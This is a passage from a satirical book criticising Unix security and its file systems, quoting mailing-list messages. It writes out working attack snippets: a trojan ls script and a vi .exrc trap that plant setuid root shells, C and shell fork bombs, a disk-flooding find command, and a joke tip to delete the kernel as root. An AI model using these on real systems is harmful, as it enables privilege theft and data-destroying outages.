Two fundamental design flaws prevent Unix from being secure. First, Unix stores security information about the computer inside the computer itself, without encryption or other mathematical protections. It’s like leaving the keys to your safe sitting on your desk: as soon as an attacker breaks through the Unix front door, he’s compromised the entire system. Second, the Unix superuser concept is a fundamental security weakness. Nearly all Unix systems come equipped with a special user, called root, that circumvents all security checks and has free and total reign of the system. The superuser may delete any file, modify any programs, or change any user’s password without an audit trail being left behind.
Superuser: The Superflaw

All multiuser operating systems need privileged accounts. Virtually all multiuser operating systems other than Unix apportion privilege according to need, but Unix’s “Superuser” is all-or-nothing. An administrator who can change people’s passwords must also, by design, be able to wipe out every file on the system. That high school kid you’ve hired to do backups might accidentally (or intentionally) leave your system open to attack.

Many Unix programs and utilities require Superuser privileges. Complex and useful programs need to create files or write in directories to which the user of the program does not have access. To ensure security, programs that run as superuser must be carefully scrutinized to ensure that they exhibit no unintended side effects and have no holes that could be exploited to gain unauthorized superuser access. Unfortunately, this security audit procedure is rarely performed (most third-party software vendors, for example, are unwilling to disclose their source code to their customers, so these companies couldn’t even conduct an audit if they wanted to).

The Problem with SUID

The Unix concept called SUID, or setuid, raises as many security problems as the superuser concept does. SUID is a built-in security hole that provides a way for regular users to run commands that require special privileges to operate. When run, an SUID program assumes the privileges of the person who installed the program, rather than the person who is running the program. Most SUID programs are installed SUID root, so they run with superuser privileges.

The designers of the Unix operating system would have us believe that SUID is a fundamental requirement of an advanced operating system. The most common example given is /bin/passwd, the Unix program that lets users change their passwords. The /bin/passwd program changes a user’s password by modifying the contents of the file /etc/passwd. Ordinary users can’t be allowed to directly modify /etc/passwd because then they could change each other’s passwords. The /bin/passwd program, which is run by mere users, assumes superuser privileges when run and is constructed to change only the password of the user running it and nobody else’s.

Unfortunately, while /bin/passwd is running as superuser, it doesn’t just have permission to modify the file /etc/passwd: it has permission to modify any file, indeed, do anything it wants. (After all, it’s running as root, with no security checks.) If it can be subverted while it is running—for example, if it can be convinced to create a subshell—then the attacking user can inherit these superuser privileges to control the system.
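What the setuid bit looks like on disk is easy to demonstrate (a sketch added here, not from the original text; a harmless scratch file stands in for /bin/passwd, which only root can install):

```shell
# Make a scratch file and set the SUID bit on it (the leading 4 in 4755):
touch /tmp/suid-demo
chmod 4755 /tmp/suid-demo

# An 's' replaces the owner's execute bit in the listing: -rwsr-xr-x
ls -l /tmp/suid-demo

# The classic audit: enumerate every setuid-root program on the system.
# (Slow, and some directories may not be readable without privileges.)
# find / -user root -perm -4000 -print

rm /tmp/suid-demo
```

On a real system, `ls -l /bin/passwd` shows that same `s` bit, which is why the program runs as root no matter who invokes it.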
AT&T was so pleased with the SUID concept that it patented it. The intent was that SUID would simplify operating system design by obviating the need for a monolithic subsystem responsible for all aspects of system security. Unfortunately, experience has shown that most of Unix’s security flaws come from SUID programs.

When combined with removable media (such as floppy disks or SyQuest drives), SUID gives the attacker a powerful way to break into otherwise “secure” systems: simply put a SUID root file on a floppy disk and mount it, then run the SUID root program to become root. (The Unix-savvy reader might object to this attack, saying that mount is a privileged command that requires superuser privileges to run. However, many manufacturers now provide SUID programs for mounting removable media specifically to ameliorate this “inconvenience.”)

SUID isn’t limited to the superuser—any program can be made SUID, and any user can create an SUID program to assume that user’s privileges when it is run (without having to force anybody to type that user’s password). SUID is a powerful tool for building traps that steal other users’ privileges.

The Cuckoo’s Egg

As an example of what can go wrong, consider an example from Cliff Stoll’s excellent book The Cuckoo’s Egg. Stoll tells how a group of computer crackers in West Germany broke into numerous computers across the United States and Europe by exploiting a “bug” in an innocuous utility, called movemail, for a popular Unix editor, Emacs. When it was originally written, movemail simply moved incoming pieces of electronic mail from the user’s mailbox in /usr/spool/mail to the user’s home directory. So far, so good: no problems here. But then the program was modified in 1986 by Michael R. Gretzinger at MIT’s Project Athena. Gretzinger wanted to use movemail to get his electronic mail from Athena’s electronic post office running POP (the Internet Post Office Protocol). In order to make movemail work properly with POP, Gretzinger found it necessary to install the program SUID root. You can even find Gretzinger’s note in the movemail source code:

/*
 * Modified January, 1986 by Michael R. Gretzinger (Project Athena)
 *
 * Added POP (Post Office Protocol) service.  When compiled -DPOP
 * movemail will accept input filename arguments of the form
 * "po:username".  This will cause movemail to open a connection to
 * a pop server running on $MAILHOST (environment variable).
 * Movemail must be setuid to root in order to work with POP.
 *
 */

There was just one problem: the original author of movemail had never suspected that the program would one day be running SUID root. And when the program ran as root, it allowed the user whose mail was being moved to read or modify any file on the entire system. Stoll’s West German computer criminals used this bug to break into military computers all over the United States and Europe at the behest of their KGB controllers. Eventually the bug was fixed. Here is the three-line patch that would have prevented this particular break-in:

/* Check access to output file. */
if (access (outname, F_OK) == 0 && access (outname, W_OK) != 0)
  pfatal_with_name (outname);

How could anyone have audited that code before they installed it and detected this bug? The problem is that movemail itself is 838 lines long—and movemail itself is a minuscule part of a program that is nearly 100,000 lines long.

The Other Problem with SUID

SUID has another problem: it gives users the power to make a mess, but not to clean it up. SUID programs are (usually) SUID to do something special that requires special privileges. When they start acting up, or if you run the wrong one by accident, you need a way of killing it. But if you don’t have superuser privileges yourself, you are out of luck:

Date: Sun, 22 Oct 89 01:17:19 EDT
From: Robert E. Seastrom <rs@ai.mit.edu>
To: UNIX-HATERS
Subject: damn setuid

Tonight I was collecting some info on echo times to a host that’s on the far side of a possibly flakey gateway. Since I have better things to do than sit around for half an hour while it pings said host every 5 seconds, I say:

% ping -t5000 -f 60 host.domain > logfile &
Now, what’s wrong with this? Ping, it turns out, is a setuid root program, and now when I’m done with it I CAN’T KILL THE PROCESS BECAUSE UNIX SAYS IT’S NOT MINE TO KILL! So I think “No prob, I’ll log out and then log back in again and it’ll catch SIGHUP and die, right?” Wrong. It’s still there and NOW I’M TRULY SCREWED BECAUSE I CAN’T EVEN TRY TO FG IT! So I have to run off and find someone with root privileges to kill it for me! Why can’t Unix figure out that if the ppid of a process is the pid of your shell, then it’s yours and you can do whatever you bloody well please with it?

Unix security tip of the day: You can greatly reduce your chances of breakin by crackers and infestation by viruses by logging in as root and typing:

% rm /vmunix

Processes Are Cheap—and Dangerous

Another software tool for breaking Unix security is the pair of system calls fork() and exec(), which enable one program to spawn other programs. Programs spawning subprograms lie at the heart of Unix’s tool-based philosophy. Emacs and FTP run subprocesses to accomplish specific tasks such as listing files. The problem for the security-conscious is that these programs inherit the privileges of the programs that spawn them. When the spawning program is running as superuser, then its spawned process also runs as superuser. Easily spawned subprocesses are a two-edged sword, because a spawned subprogram can be a shell that lowers the drawbridge to let the Mongol hordes in. Indeed, the “Internet Worm” (discussed later in this chapter) broke into unsuspecting computers by running network servers and then convincing them to spawn subshells. Why did these network servers have the appropriate operating system permission to spawn subshells, when they never have to spawn a subshell in their normal course of operation? Because every Unix program has this ability; there is no way to deny subshell-spawning privileges to a program (or a user, for that matter). Many a cracker has gained entry through spawned superuser shells.
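The inheritance described above is visible from an ordinary shell (a sketch added here, not from the book): every child a program spawns carries the parent's identity, however deep the nesting.

```shell
# A process and any subshell it spawns report the same uid:
id -u
sh -c 'id -u'            # the child inherited the parent's credentials

# Grandchildren inherit them too -- which is the whole attack surface:
# had the parent been running as root (uid 0), every one of these
# spawned shells would be a root shell.
sh -c 'sh -c "id -u"'
```

Nothing in the chain can refuse the privilege or be denied the right to spawn, which is exactly the complaint in the text.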
The Problem with PATH

Unix has to locate the executable image that corresponds to a given command name. To find the executable, Unix consults the user’s PATH variable for a list of directories to search. For example, if your PATH environment is :/bin:/usr/bin:/etc:/usr/local/bin:, then, when you type snarf, Unix will automatically search through the /bin, /usr/bin, /etc, and /usr/local/bin directories, in that order, for a program snarf. Doing so is an incredible convenience when developing new programs. However, it is also a powerful technique for cracking security by leaving traps for other users. PATH variables such as this are a common disaster:

PATH=:.:/bin:/usr/bin:/usr/local/bin:

Having “.”—the current directory—as the first element instructs Unix to search the current directory for commands before searching /bin, /usr/bin, and /usr/local/bin.

Suppose you are a student at a nasty university that won’t let you have superuser privileges. Just create a file (please, don’t try this yourself!) called ls in your home directory that contains:

#!/bin/sh
/bin/cp /bin/sh /tmp/.sh1
/etc/chmod 4755 /tmp/.sh1
/bin/rm $0
exec /bin/ls $1 $2 $3 $4

The four lines do the following: copy the shell program to /tmp; give it the privileges of the person invoking the ls command; remove this script; run the real ls. Now, go to your system administrator and tell him that you are having difficulty finding a particular file in your home directory. If your system operator is brain-dead, he will type the following two lines on his terminal:

% cd <your home directory>
% ls

Now you’ve got him. Although he’ll think you’re stupid, he’s the dummy: the ls program run isn’t /bin/ls, but the specially created ls program in your home directory. This version of ls puts a SUID shell program in the /tmp directory that inherits all of the administrator’s privileges when it runs, and he doesn’t even know it. At your leisure you’ll run the newly created /tmp/.sh1 to read, use, delete, or run any of his files without the formality of learning his password or logging in as him. Congratulations! The entire system is at your mercy.

Startup traps

When a complicated Unix program starts up, it reads configuration files from either the user’s home directory and/or the current directory to set initial and default parameters that customize the program to the user’s specifications. Unfortunately, startup files can be created and left by other users to do their bidding on your behalf.

An extremely well-known startup trap preys upon vi, a simple, fast screen-oriented editor that’s preferred by many sysadmins. It’s too bad that vi can’t edit more than one file at a time, which is why sysadmins frequently start up vi from their current directory, rather than in their home directory. Therein lies the rub. At startup, vi searches for a file called .exrc, the vi startup file, in the current directory. Want to steal a few privs? Put a file called .exrc with the following contents into a directory:

!(cp /bin/sh /tmp/.s$$;chmod 4755 /tmp/.s$$)&

and then wait for an unsuspecting sysadmin to invoke vi from that directory. When she does, she’ll see a flashing exclamation mark at the bottom of her screen for a brief instant, and you’ll have an SUID shell waiting for you in /tmp, just like the previous attack.

Trusted Path and Trojan Horses

A trusted path is a fundamental requirement for computer security, yet it is theoretically impossible to obtain in most versions of Unix. Consider the standard Unix login procedure:

login: jrandom
password: <type your “secret” password>

When you type your password, how do you know that you are typing to the honest-to-goodness Unix /bin/login program, and not some treacherous doppelganger? Such doppelgangers, called “trojan horses,” are widely available on cracker bulletin boards; their sole purpose is to capture your username and password for later, presumably illegitimate, use. /etc/getty, which asks for your username, and /bin/login, which asks for your password, are no different from any other program. They happen to be programs that ask you for highly confidential and sensitive information to verify that you are who you claim to be, but you have no way of verifying them.

Compromised Systems Usually Stay That Way

Unix Security sat on a wall.
Unix Security had a great fall.
All the king’s horses,
And all the king’s men,
Couldn’t get Security back together again.

Re-securing a compromised Unix system is very difficult. Once an attacker breaks into a Unix system, she edits the log files to erase any traces of her incursion. Intruders usually leave startup traps, trap doors, and trojan horses in their wake. After a security incident, it’s often easier to reinstall the operating system from scratch, rather than pick up the pieces.

For example, a computer at MIT in recent memory was compromised. The attacker was eventually discovered, and his initial access hole was closed. But the system administrator (a Unix wizard) didn’t realize that the attacker had modified the computer’s /usr/ucb/telnet program. For the next six months, whenever a user on that computer used telnet to connect to another computer at MIT, or anywhere else on the Internet, the Telnet program captured, in a local file, the victim’s username and password on the remote computer. The attack was only discovered because the computer’s hard disk ran out of space after bloating with usernames and passwords.

Attackers trivially hide their tracks. Many system operators examine the modification dates of files to detect unauthorized modifications, but an attacker who has gained superuser capabilities can reprogram the system clock—they can even use the Unix functions specifically provided for changing file times. The Unix file system is a mass of protections and permission bits. If a single file, directory, or device has incorrectly set permission bits, it puts the security of the entire system at risk. This is a double whammy that makes it relatively easy for an experienced cracker to break into most Unix systems and, after cracking the system, to create holes that allow future reentry.
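The point about modification times is easy to verify for oneself: no special privileges are needed to backdate a file you own (a sketch added here, not from the original text; `-ot` is a common `test` extension in bash and ksh):

```shell
# Create a file "now" and one that claims to date from New Year's Day 1990:
touch /tmp/honest
touch -t 199001010000 /tmp/backdated

ls -l /tmp/honest /tmp/backdated   # the forged date looks perfectly normal

# The shell's own comparison is fooled along with the sysadmin:
[ /tmp/backdated -ot /tmp/honest ] && echo "backdated file tests as older"

rm /tmp/honest /tmp/backdated
```

An attacker with superuser privileges can do the same to files owned by anyone, which is why timestamps prove nothing after a break-in.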
Cryptic Encryption

Encryption is a vital part of computer security. When somebody steals your Unix computer’s disk drive (or your backup tapes), it doesn’t matter how well users’ passwords have been chosen: the attacker merely hooks the disk up to another system, and all of your system’s files are open for perusal. (Think of this as a new definition for the slogan “open systems.”) Sadly, Unix offers no built-in system for automatically encrypting files stored on the hard disk.

Most versions of Unix come with an encryption program called crypt. (We have no idea why Bell Laboratories decided to distribute crypt with the original Unix system.) But in many ways, using crypt is worse than using no encryption program at all. Using crypt is like giving a person two aspirin for a heart attack. Crypt’s encryption algorithm is incredibly weak—so weak that several years ago, a graduate student at the MIT Artificial Intelligence Laboratory wrote a program that automatically decrypts data files encrypted with crypt. It doesn’t occur to most people that crypt is so easy to break.

Paul Rubin writes: “This can save your ass if you accidentally use the ‘x’ command (encrypt the file) that is in some versions of ed, thinking that you were expecting to use the ‘x’ command (invoke the mini-screen editor) that is in other versions of ed. You hit a bunch of keys at random to see why the system seems to have hung (you don’t realize that the system has turned off echo so that you can type your secret encryption key), but after you hit carriage-return, the editor saves your work normally again, so you shrug and return to work. Then much later you write out the file and exit, not realizing until you try to use the file again that it was written out encrypted—and that you have no chance of ever reproducing the random password you unknowingly entered by banging on the keyboard. I’ve seen people try for hours to bang the keyboard in the exact same way as the first time because that’s the only hope they have of getting their file back.”

But we know that the program’s authors knew how weak and unreliable crypt actually was, as evidenced by their uncharacteristic disclaimer in the program’s man page:

BUGS: There is no warranty of merchantability nor any warranty of fitness for a particular purpose nor any other warranty, either express or implied, as to the accuracy of the enclosed materials or as to their suitability for any particular purpose. Accordingly, Bell Telephone Laboratories assumes no responsibility for their use by the recipient.
Bell Laboratories assumes no obligation to furnish any assistance of any kind whatsoever, or to furnish any additional information or documentation.

Some recent versions of Unix contain a program called des that performs encryption using the National Security Agency’s Data Encryption Standard. Although DES (the algorithm) is reasonably secure, des (the program) isn’t, since Unix provides no tools for having a program verify des’s authenticity before it executes. When you run des (the program), there is no way to verify that it hasn’t been modified to squirrel away your valuable encryption keys or isn’t e-mailing a copy of everything encrypted to a third party.

The Problem with Hidden Files

Unix’s ls program suppresses files whose names begin with a period (such as .cshrc and .login) by default from directory displays. Attackers exploit this “feature” to hide their system-breaking tools by giving them names that begin with a period. Computer crackers have hidden megabytes of information in unsuspecting users’ directories.

Using file names that contain spaces or control characters is another powerful technique for hiding files from unsuspecting users. Most trusting users (maybe those who have migrated from the Mac or from MS-Windows) who see a file in their home directory called system won’t think twice about it—especially if they can’t delete it by typing rm system. “If you can’t delete it,” they think, “it must be because Unix was patched to make it so I can’t delete this critical system resource.” You can’t blame them, because there is no mention of the “system” directory in the documentation: lots of things about Unix aren’t mentioned in the documentation. How are they to know that the directory contains a space at the end of its name, which is why they can’t delete it? How are they to know that it contains legal briefs stolen from some AT&T computer in Walla Walla, Washington? And why would they care, anyway? Security is the problem of the sysadmins, not them.

Denial of Service

A denial-of-service attack makes the computer unusable to others, without necessarily gaining access to privileged information. Unlike other operating systems, Unix has remarkably few built-in safeguards against denial-of-service attacks.
two processes create clones of themselves. it still doesn’t prevent the system from being rendered virtually unusable.) No one can even run the su command to become Superuser! (Again. you can bring it to a halt by compiling and running the following program: main() { while(1){ fork(). While this patch prevents the system user from being locked out of the system after the user launches a process attack. for a total of four processes. Next time. (To be fair. a single process creates a clone of itself. any Unix user can launch this attack.) And if you are using sh. 30 or 60 different processes are active. And best of all. You don’t even need a C compiler to launch this creative attack. each one continually calling the fork() system call. until the Unix system becomes incapable of creating any more processes.254 Security of-service attacks. some versions of Unix do have a per-user process limit. Just try this on for size: #!/bin/sh $0 & exec $0 Both these attacks are very elegant: once they are launched. At this point. only to receive an error message that no more processes can be created. The first time through the loop. be it a desktop PC or a Unix mainframe. If you have an account on a Unix computer. A millimoment later. Unix was created in a research environment in which it was more important to allow users to exploit the computer than to prevent them from impinging upon each other’s CPU time or file allocations. the only way to regain control of your Unix system is by pulling the plug because no one can run the ps command to obtain the process numbers of the offending processes! (There are no more processes left. thanks to the programmability of the Unix shell. That’s because Unix doesn’t have . This program is guaranteed to grind any Unix computer to a halt. no processes. eight processes are busy cloning themselves. and so on. you can’t even run the kill command. } } This program runs the fork() (the system call that spawns a new process) continually. 
because to run it you need to be able to create a new process.
With a per-user process limit set at 50, those 50 processes from the attacking user will quickly swamp the computer and stop all useful work on the system. Unix grinds to a halt. That's because Unix doesn't have any per-user CPU time quotas, and there is no effective prophylactic against users who get their jollies in strange ways.

Disk Overload

Another attack brings Unix to its knees without even using up the CPU, thanks to Unix's primitive approach to disk and network activity. It's easy: just start four or five find jobs streaming through the file system with the command:

% repeat 4 find / -exec wc {} \;

Each find process reads the contents of every readable file on the file system, which flushes all of the operating system's disk buffers. Almost immediately, Unix grinds to a halt. It's simple and neat.

Not exciting enough? Well, thanks to the design of the Unix network system, you can paralyze any Unix computer on the network by remote control, without even logging in. Simply write a program to open 50 connections to the sendmail daemon on a remote computer and send random garbage down these pipes. Users of the remote machine will experience a sudden, unexplained slowdown. If the random data cause the remote sendmail program to crash and dump core, the target machine will run even slower.

System Usage Is Not Monitored

Sadly, Unix doesn't always wait for an attack of the type described above; sometimes, like firemen who set fires during the slow season, it launches one itself. Sendmail is among the worst offenders: sometimes, for no reason at all, a sendmail process will begin consuming large amounts of CPU time. Ever have a Unix computer inexplicably slow down? You complain to the resident Unix guru (assuming you haven't been jaded enough to accept this behavior); he'll type some magic commands, then issue some cryptic statement such as: "Sendmail ran away. I had to kill it. Things should be fine now." Sendmail ran away? He's got to be kidding, you think. He's not. The only action that a hapless sysadmin can take is to kill the offending process and hope for better "luck" the next time.
The Worms Crawl In

In November 1988, an electronic parasite (a "worm") disabled thousands of workstations and super-minicomputers across the United States. The worm attacked through a wide-area computer network called the Internet. News reports placed the blame for the so-called "Internet Worm" squarely on the shoulders of a single Cornell University graduate student, Robert T. Morris. A jury found him guilty of writing a computer program that would "attack" systems on the network and "steal" passwords. Releasing the worm was something between a prank and a widescale experiment. But the real criminal of the "Internet Worm" episode wasn't Robert Morris, but years of neglect of computer security issues by authors and vendors of the Unix operating system.

Morris's program wasn't an "Internet Worm." After all, it left alone all Internet machines running VMS, Apollo/Domain, TOPS-20, ITS, or Genera. It was strictly and purely a Unix worm. Morris's worm attacked not by cunning, stealth, or sleuth, but by exploiting two well-known bugs in the Unix operating system—bugs that inherently resulted from Unix's very design.

One of the network programs, sendmail, was distributed by Sun Microsystems and Digital Equipment Corporation with a special command called DEBUG. Any person connecting to a sendmail program over the network and issuing a DEBUG command could convince the sendmail program to spawn a subshell. The Morris worm also exploited a bug in the finger program. By sending bogus information to the finger server, fingerd, it forced the computer to execute a series of commands that eventually created a subshell. If the finger server had been unable to spawn subshells, the Morris worm would have crashed the Finger program, but it would not have created a security-breaking subshell.

Date: Tue, 15 Nov 88 13:30 EST
From: Richard Mlynarik <mly@ai.mit.edu>
To: UNIX-HATERS
Subject: The Chernobyl of operating systems

[I bet more 'valuable research time' is being 'lost' by the randoms flaming about the sendmail worm than was 'lost' due to worm-invasion. All those computer science 'researchers' do in any case is write increasingly sophisticated screen-savers or read netnews.]

Date: 11 Nov 88 15:27 GMT+0100
From: Klaus Brunnstein <brunnstein@rz.informatik.uni-hamburg.dbp.de>
To: RISKS-LIST@KL.SRI.COM
Subject: UNIX InSecurity (beyond the Virus-Worm)

[...random security stuff...]

While the Virus-Worm did evidently produce only limited damage (esp. 'eating' time and intelligence during a 16-hour nightshift, and further distracting activities in follow-up discussions, but at the same time teaching some valuable lessons), the 'Chernobyl of Computing' is being programmed in economic applications if ill-advised customers follow the computer industry into insecure Unix-land. To me as an educated physicist, parallels show up to the discussions of the risks overseen by the community of nuclear physicists. I slightly revise Peter Neumann's analogy to the Three-Mile-Island and Chernobyl accidents: the advent of the Virus-Worm may be comparable to a mini Three-Mile Island accident (with large threat though limited damage). In such a sense, the consequence of the Unix euphoria may damage enterprises and economies.

Klaus Brunnstein
University of Hamburg, FRG
13
The File System
Sure It Corrupts Your Files, But Look How Fast It Is!

Pretty daring of you to be storing important files on a Unix system.
—Robert E. Seastrom

The traditional Unix file system is a grotesque hack that, over the years, has been enshrined as a "standard" by virtue of its widespread use. Indeed, after years of indoctrination and brainwashing, people now accept Unix's flaws as desired features. It's like a cancer victim's immune system enshrining the carcinoma cell as ideal because the body is so good at making them.

Way back in the chapter "Welcome, New User," we started a list of what's wrong with the Unix file systems. For users, the most obvious failing is that the file systems don't have version numbers and Unix doesn't have an "undelete" capability—two faults that combine like sodium and water in the hands of most users. But the real faults of Unix file systems run far deeper than these two missing features. The faults are not faults of execution, but of ideology. With Unix, we are often told, "everything is a file." Thus, it's not surprising that many of Unix's fundamental faults lie with the file system as well.
What's a File System?

A file system is the part of a computer's operating system that manages file storage on mass-storage devices such as floppy disks and hard drives. Each piece of information has a name, called the filename, and a unique place (we hope) on the hard disk. The file system's duty is to translate names such as /etc/passwd into locations on the disk such as "block 32156 of hard disk #2." It also supports the reading and writing of a file's blocks. Although conceptually a separable part of the operating system, in practice, nearly every operating system in use today comes with its own peculiar file system.

Meet the Relatives

In the past two decades, the evil stepmother Unix has spawned not one, not two, but four different file systems. These step-systems all behave slightly differently when running the same program under the same circumstances.

The seminal Unix File System (UFS), the eldest half-sister, was sired in the early 1970s by the original Unix team at Bell Labs. Its most salient feature was its freewheeling conventions for filenames: it imposed no restrictions on the characters in a filename other than disallowing the slash character ("/") and the ASCII NUL. As a result, filenames could contain a multitude of unprintable (and untypable) characters, a "feature" often exploited for its applications to "security." UFS also limited filenames to 14 characters in length.

The Berkeley Fast (and loose) File System (FFS) was a genetic makeover of UFS engineered at the University of California at Berkeley. It wasn't fast, but it was faster than the UFS it replaced, much in the same way that a turtle is faster than a slug. Throughout the 1980s, Berkeley actually made a variety of legitimate, practical improvements to the UFS. Most importantly, FFS eliminated UFS's infamous 14-character filename limit. It also introduced a variety of new and incompatible features. Foremost among these was symbolic links—entries in the file system that could point to other files, directories, devices, or whatnot. Berkeley's "fixes" would have been great had they been back-propagated to Bell Labs. But in a classic example of Not Invented Here, AT&T refused Berkeley's new code, leading to two increasingly divergent file systems with a whole host of mutually incompatible file semantics. Some "standard" Unix programs knew that filenames could be longer than 14 characters; others didn't. Some knew that a "file" in the file system might actually be a symbolic link; others didn't. Some programs worked as expected. Most didn't.1

Sun begat the Network File System NFS. NFS allegedly lets different networked Unix computers share files "transparently." With NFS, one computer is designated as a "file server," and another computer is called the "client." The (somewhat dubious) goal is for the files and file hierarchies on the server to appear more or less on the client in more or less the same way that they appear on the server. Although Apollo Computers had a network file system that worked better than NFS several years before NFS was a commercial product, NFS became the dominant standard because it was "operating system independent" and Sun promoted it as an "open standard." Only years later, when programmers actually tried to develop NFS servers and clients for operating systems other than Unix, did they realize how operating system dependent and closed NFS actually is.

The Andrew File System (AFS), the youngest half-sister, is another network file system that is allegedly designed to be operating system independent. Developed at CMU (on Unix systems), AFS has too many Unix-isms to be operating system independent. And while AFS is technically superior to NFS (perhaps because it is superior), it will never gain widespread use in the Unix marketplace because NFS has already been adopted by everyone in town and has become an established standard. AFS's two other problems are that it was developed by a university (making it suspect in the eyes of many Unix companies) and is being distributed by a third-party vendor who, instead of giving it away, is actually trying to sell the program. AFS is difficult to install and requires reformatting the hard disk, so you can see that it will die a bitter also-ran.

Visualize a File System

Take a few moments to imagine what features a good file system might provide to an operating system, and you'll quickly see the problems shared by all of the file systems described in this chapter.

A good file system imposes as little structure as needed or as much structure as is required on the data it contains. It fits itself to your needs, rather than requiring you to tailor your data and your programs to its peculiarities. A good file system provides the user with byte-level granularity—it lets you open a file and read or write a single byte—but it also provides support for record-based operations: reading, writing, or locking a database record-by-record. The file system should store the length of each record. (This might be one of the reasons that most Unix database companies bypass the Unix file system entirely and implement their own.)

More than simple database support, advanced file systems exploit the features of modern hard disk drives and controllers. For example, since most disk drives can transfer up to 64K bytes in a single burst, advanced file systems store files in contiguous blocks so they can be read and written in a single operation. Most files get stored within a single track, so that the file can be read or updated without moving the disk drive's head (a relatively time-consuming process). They also have support for scatter/gather operations, so many individual reads or writes can be batched up and executed as one.

Lastly, advanced file systems are designed to support network access. They're built from the ground up with a network protocol that offers high performance and reliability. A network file system that can tolerate the crash of a file server or client and that, most importantly, doesn't alter the contents of files or corrupt information written with it is an advanced system.

At the very least, the file system should allow you to store a file "type" with each file. The type indicates what is stored inside the file, be it program code, an executable object-code segment, or a graphical image. Truly advanced file systems allow users to store comments with each file. A mature file system allows applications or users to store out-of-band information with each file, such as access control lists (the names of the individuals who are allowed to access the contents of the files and the rights of each user), and so on.

All of these features have been built and fielded in commercially offered operating systems. Unix offers none of them.

UFS: The Root of All Evil

Call it what you will, UFS occupies the fifth ring of hell, buried deep inside the Unix kernel. Written as a quick hack at Bell Labs over several months, UFS's quirks and misnomers are now so enshrined in the "good senses" of computer science that, in order to criticize them, it is first necessary to warp one's mind to become fluent with their terminology.

1 Try using cp -r to copy a directory with a symbolic link to "." and you'll get the idea (before you run out of disk space, we hope).
UFS lives in a strange world where the computer's hard disk is divided into three different parts: inodes, data blocks, and the free list. Inodes are pointers to blocks on the disk. They store everything interesting about a file—its contents, its owner, group, when it was created, when it was modified, when it was last accessed—everything, that is, except for the file's name. An oversight? No, it's a deliberate design decision.

Filenames are stored in a special filetype called directories, which point to inodes. An inode may reside in more than one directory. Unix calls this a "hard link," which is supposedly one of UFS's big advantages: the ability to have a single file appear in two places. In practice, hard links are a debugging nightmare. You copy data into a file, and all of a sudden—surprise—it gets changed, because the file is really hard linked with another file. Which other file? There's no simple way to tell. Some two-bit moron whose office is three floors up is twiddling your bits. But you can't find him.

The struggle between good and evil, yin and yang, plays itself out on the disks of Unix's file system, because system administrators must choose, before the system is running, how to divide the disk into bad (inode) space and good (usable file) space. (As we all know from our own lives, too much or too little of either is not much fun.) Once this decision is made, it is set in stone: the system cannot trade between good and evil as it runs. In Unix's case, when the file system runs out of inodes, it won't put new files on the disk, even if there is plenty of room for them! This happens all the time when putting Unix File Systems onto floppy disks. So most people tend to err on the side of caution and over-allocate inode space. (Of course, that means that they run out of disk blocks, but still have plenty of inodes left…) The result is too much allocated inode space, which decreases the usable disk space, thereby increasing the cost per useful megabyte. Unix manufacturers, in their continued propaganda to convince us Unix is "simple to use," simply make the default inode space very large.

To ensure files are not lost or corrupted, UFS maintains a free list of doubly-linked data blocks not currently under use. Unix needs this free list because there isn't enough online storage space to track all the blocks that are free on the disk at any instant. Unfortunately, it is very expensive to keep the free list consistent: to create a new file, the kernel needs to find a block B on the free list, remove the block from the free list by fiddling with the pointers on the blocks in front of and behind B, and then create a directory entry that points to the inode of the newly un-freed block. The operations must be performed atomically and in order; otherwise data can be lost if the computer crashes while the update is taking place.
(Interrupting these sorts of operations can be like interrupting John McEnroe during a serve: both yield startling and unpredictable results.) No matter! The people who designed the Unix File System didn't think that the computer would crash very often. Rather than taking the time to design UFS so that it would run fast and keep the disk consistent (it is possible to do this), they designed it simply to run fast. Orderly Unix shutdowns cause no problems, and as long as you don't crash during one of these moments, you're fine. But what about power failures and glitches? What about goonball technicians and other incompetent people unplugging the wrong server in the machine room? What about floods in the sewers of Chicago? Well, in any event, you're left with a wet pile of noodles where your file system used to be: when Unix crashes, the hard disk is usually left in an inconsistent state.

The tool that tries to rebuild your file system from those wet noodles is fsck (pronounced "Fsick"), the file system consistency checker. It scans the entire file system looking for damage that a crashing Unix typically exacts on its disk. Usually fsck can recover the damage. Sometimes it can't. (If you've been having intermittent hardware failures, SCSI termination problems, and incomplete block transfers, frequently it can't.) fsck can take 5, 10, or 20 minutes to find out. During this time, Unix is literally holding your computer hostage.

Here's a message that was forwarded to UNIX-HATERS by MLY; it originally appeared on the Usenet newsgroup comp.arch in July 1990:

Date: 13 Jul 90 16:58:55 GMT
From: aglew@oberon.crhc.uiuc.edu (Andy Glew)2
Subject: Fast Re-booting
Newsgroups: comp.arch

A few years ago a customer gave us a <30 second boot after power cycle requirement, for a real-time OS. They wanted <10.

This DECstation 3100, with 16MB of memory and an approximately 300Mb local SCSI disk, took 8:19 (eight minutes and nineteen seconds) to reboot after power-cycle. That included fsck'ing the disk. Time measured from the time I flicked the switch to the time I could log in.

2 Forwarded to UNIX-HATERS by Richard Mlynarik.
That may be good by Unix standards, but it's not great. Modern file systems use journaling, roll-back, and other sorts of file operations invented for large-scale databases to ensure that the information stored on the computer's hard disk is consistent at all times—just in case the power should fail at an inopportune moment. IBM built this technology into its Journaling File System (first present in AIX V3 on the RS/6000 workstation). Journaling is in USL's new Veritas file system. Will journaling become prevalent in the Unix world at large? Probably not. After all, it's nonstandard.

Automatic File Corruption

Sometimes fsck can't quite put your file system back together. The following is typical:
Date: Wed, 29 May 91 00:42:20 EDT
From: curt@ai.mit.edu (Curtis Fennell)3
Subject: Mixed up mail
To: all-ai@ai.mit.edu

Life4 had, what appears to be, hardware problems that caused a number of users' mailboxes to be misassigned. Life crashed and the partition containing /com/mail failed the file-system check. Soon after starting to work on this problem, it became clear that the problem was not entirely consistent and there were some files that did not appear to be associated with the owner or the filename.

At first it seemed that the ownership of a subset of the mailboxes had been changed, but it later became clear that, for the most part, the ownership was correct but the name of the file was wrong. For example, the following problem occurred:

-rw------- 1 bmh user 9873 May 28 18:03 kchang

but the contents of the file 'named' kchang was really that of the user bmh. I have straightened this out as best I could and reassigned ownerships. Note that I associated ownerships by using the file ownerships and grep'ing for the "TO:" header line for confirmation; I did not grovel through the contents of private mailboxes. I was unable to assign a file named 'sam.' It ought to have belonged to sae, but I think I have correctly associated the real mailbox with that user, so I left the file in /com/mail/strange-sam.

Several mailboxes were deleted while attempting to reboot. Jonathan has a list of the deleted files. Please talk to him if you lost data.

Below I include a list of the 60 users whose mailboxes are most likely to be at risk. Please take a moment to attempt to check your mailbox. (A number of people have complained about the fact that they could not seem to read their mailboxes. This should be fixed.) The user receives mail sent to bizzi, motor-control, cbip-meet, whitaker-users, etc. Please feel free to talk to me if you wish clarification on this problem.

